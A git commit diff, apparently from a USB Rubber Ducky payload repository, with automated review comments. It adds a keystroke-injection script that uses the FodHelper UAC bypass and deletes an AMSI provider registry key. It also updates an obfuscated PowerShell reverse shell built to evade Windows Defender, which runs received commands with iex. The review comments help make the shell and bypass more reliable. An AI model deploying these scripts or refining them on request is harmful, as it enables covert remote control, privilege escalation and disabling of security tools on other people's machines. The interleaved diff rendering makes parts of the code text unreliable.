Updated ReverseDucky to v. 1.1 (#17)
* Uploaded ReverseDuckyII ReverseDucky2 - A faster way to gain a reverse shell & easier to configure Obfuscated Powershell code to bypass AMSI & Windows Defender. * Update ReverseDucky to v. 1.1 Updated ReverseDucky to version 1.1 - Shorten the code (Now faster than RDII) & still evade Defender. * Update ReverseDucky.txt * Create DuckyHelper UAC bypass for privilege escalation (Method FodHelper)pull/19/head
parent
2509641d36
commit
f3c751a046
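--- /dev/null
+++ b/DuckyHelper
@@ -0,0 +1,47 @@
+REM DuckyHelper
+REM Version 1.0
+REM OS: Windows 10
+REM Author: 0iphor13
+
+REM UAC bypass for privilege escalation (Method FodHelper)
+REM AV will notify, but payload will still be executed
+REM Payload configured in line 19 & 21 (cmd.exe) : $P="cmd.exe /c powershell New-Item 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFF}' -Force; Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse;[PAYLOAD]
+
+DELAY 1500
+GUI r
+DELAY 500
+STRING powershell -NoP -NonI -WindowStyle hidden -Exec Bypass
+DELAY 250
+ENTER
+
+DELAY 200
+STRING $P="cmd.exe /c powershell New-Item 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFF}' -Fo
+DELAY 100
+STRING rce; Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse; cmd.e
+DELAY 100
+STRING xe";Start-Sleep 1;New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force;;New-ItemProperty -Path "HKC
+DELAY 100
+STRING U:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force;Set-ItemProperty -Path "H
+DELAY 100
+STRING KCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $P -Force;Start-Process "C:\Windows\Sys
+DELAY 100
+STRING tem32\fodhelper.exe" -WindowStyle Hidden;Start-Sleep 3;Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
+DELAY 100
+ENTER
+
+DELAY 5000
+GUI r
+DELAY 500
+STRING powershell -NoP -NonI -Exec Bypass
+DELAY 250
+ENTER
+
+DELAY 200
+STRING Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
+DELAY 100
+ENTER
+
+DELAY 300
+STRING exit
+DELAY 100
+ENTER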
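Review bot: The header line `REM Payload configured in line 19 & 21 (cmd.exe)` points at two `DELAY 100` lines; counting this file, the `$P=` assignment is the `STRING` on line 18 and the `cmd.exe` placeholder is split across the chunks on lines 20 (ending `cmd.e`) and 22 (starting `xe`), so a replacement payload has to be spread over both chunks — reword it to `REM Payload: replace the cmd.exe placeholder, which is split across the STRING lines that build $P ("cmd.e" / "xe"); keep each STRING chunk short`. The `$P` payload also deletes `HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{…AFE}` and nothing in the script restores it, whereas the HKCU `ms-settings` key is cleaned up at the end of the one-liner and again in the second PowerShell window, so the header should state that this leaves a persistent, system-wide change on the target; the `New-Item` for the neighbouring `{…AFF}` key creates an empty key with no visible purpose and should be documented or dropped. The FodHelper technique only auto-elevates for a local administrator running under UAC's filtered token with UAC below "Always notify"; for other accounts it is likely to prompt or fail and the HKLM edits never happen, which belongs next to the `AV will notify` line. The fixed `Start-Sleep 3` before the cleanup `Remove-Item` is a race against fodhelper reading the hijacked key; on a slow host the payload will not fire, so that timing assumption is worth a `REM` too.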
@ -1,12 +1,11 @@
# ReverseDucky
# Version 1.0
# Author: 0iphor13
#
# A Reverse shell executed in the background with powershell
# LINE 23 - Fill the IP blocks (*FIRST BLOCK* etc) - 192 | 168 | 178 | 33
# LINE 25 - Change *PORT* to Port number
# DON'T FORGET TO START LISTENER
REM ReverseDucky
REM Version 1.1
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
REM Author: 0iphor13
|
REM Reverse shell executed in the background
REM Fill in Attacker IP & Port in line 18
REM DON'T FORGET TO START LISTENER
|
DELAY 1500
GUI r
|
@ -16,28 +15,14 @@ DELAY 250
ENTER
|
DELAY 200
STRING SeT-ITeM VARIABLE:Q528Yl ( [TYpE]("{3}{0}{1}{2}" -F '.','eN','cOdinG','TexT') ) ;${clie
STRING $I='0.0.0.0';$P=4444;$0LVhbQ= [TyPE]('tExT'+'.enCOD'+'InG') ; $C=.('New'+'-Obj'+'ect') System.Net.Sockets.TCPCl
DELAY 200
STRING NT} = &("{1}{0}{2}" -f 'Objec','New-','t') ("{6}{3}{4}{0}{7}{1}{2}{5}{8}" -f'm','.S','oc
STRING ient($I,$P);$S=$C.GetStream();[byte[]]$b=0..65535|&('%'){0};while(($i=$S.Read($b, 0, $b.Length)) -n
DELAY 200
STRING k','s','te','e','Sy','.Net','ts.TCPClient')(("{4}{1}{3}{0}{2}" -f'*3RD BLOCK*','.*2ND BLOCK*','.*4TH BLOCK*','.','*FIRST BLOCK*'),
STRING e 0){;$d=(&('New'+'-Ob'+'ject') -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb=(&('ie'+'x') $d 2>&1 | .
DELAY 200
STRING PORT);${sTReAM} = ${cliEnt}.("{1}{2}{0}" -f'tream','G','etS').Invoke();[byte[]]${byteS} = 0..655
DELAY 200
STRING 35|&('%'){0};while((${I} = ${STReAM}.("{0}{1}"-f 'R','ead').Invoke(${bYtes}, 0, ${ByTES}."lENgt
DELAY 200
STRING h")) -ne 0){;${DATa} = (.("{3}{2}{1}{0}" -f 'ect','bj','w-O','Ne') -TypeName ("{2}{0}{3}{4}{1
DELAY 200
STRING }"-f 'Tex','IEncoding','System.','t','.ASCI'))."GEtStrING"(${byTes},0, ${I});${senDBaCk} = (.("{0
DELAY 200
STRING }{1}"-f'i','ex') ${DATa} 2>&1 | .("{0}{2}{1}"-f 'Out-Str','ng','i') );${SendBACK2} = ${sENDBAc
DELAY 200
STRING K} + 'PS ' + (.("{1}{0}" -f 'd','pw'))."pATH" + '> ';${sENDbyte} = ( ( GI VaRiABLE:Q528YL )."vA
DELAY 200
STRING LuE"::"ASciI").("{2}{1}{0}"-f 'es','t','GetBy').Invoke(${SENdBaCK2});${STREam}.("{1}{0}"-f 't
DELAY 200
STRING e','Wri').Invoke(${sEnDBYTE},0,${SENdBYTE}."LengtH");${sTReAM}.("{1}{0}" -f 'lus
DELAY 200
STRING h','F').Invoke()};${cliENt}.("{1}{0}"-f'e','Clos').Invoke()
STRING ('Out'+'-St'+'ring') );$sb2=$sb+'PS '+(&('pw'+'d')).Path + '> ';$sbt=( $0lvHBq::ASCII).GetBytes($sb2);$S.Write($sbt,0,
DELAY 200
STRING $sbt.Length);$S.Flush()};$C.Close()
DELAY 100
ENTER
|
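Review bot: The new one-liner ships with `$I='0.0.0.0';$P=4444` and the only pointer to it is the header's `REM Fill in Attacker IP & Port in line 18`, a line number that drifts with every edit; `0.0.0.0` is also a syntactically valid address, so a forgotten edit produces a silent failed connect rather than an obvious error. Use a placeholder that cannot resolve, e.g. `$I='ATTACKER_IP';$P=4444`, and put the instruction next to it, `REM Set $I and $P in the STRING below`. Inherited from the previous version but still true of the new code: a terminating error raised by `iex` on a received command aborts the `while` loop, so `$C.Close()` after the loop is skipped and the socket is left to the process; wrapping the `iex` call in `try { … } catch { $_ | Out-String }` would keep the session alive on bad input. The header's new `OS: Windows / Linux(?)` line should stay marked untested, since `GUI r` and the Run-dialog launch it relies on are Windows-only. This hunk's old and new `STRING` chunks are interleaved in the rendering, so the exact new-side text past `$I=` could not be fully reconstructed here.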